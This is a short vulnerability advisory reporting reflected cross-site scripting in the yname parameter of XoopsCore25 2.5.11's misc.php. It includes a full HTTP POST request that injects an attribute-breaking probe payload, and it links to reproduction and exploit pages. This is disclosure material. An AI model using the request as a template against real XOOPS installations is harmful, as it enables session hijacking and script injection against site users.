## Title: XoopsCore25-2.5.11-XSS-Reflected
## Author: nu11secur1ty
## Date: 02/12/2024
## Vendor: https://xoops.org/
## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected

## Description:
The value of the yname request parameter is copied into the value of
an HTML tag attribute which is encapsulated in single quotation marks.
The payload '>333< was submitted in the yname parameter. This input
was echoed unmodified in the application's response. The attacker can
trick the user to visit very dangerous and malicious URL in this
session

STATUS: HIGH Vulnerability

[+]Exploit execution:
```POST
POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn
Origin: https://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 148

yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend
```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)

## Time spent:
01:17:00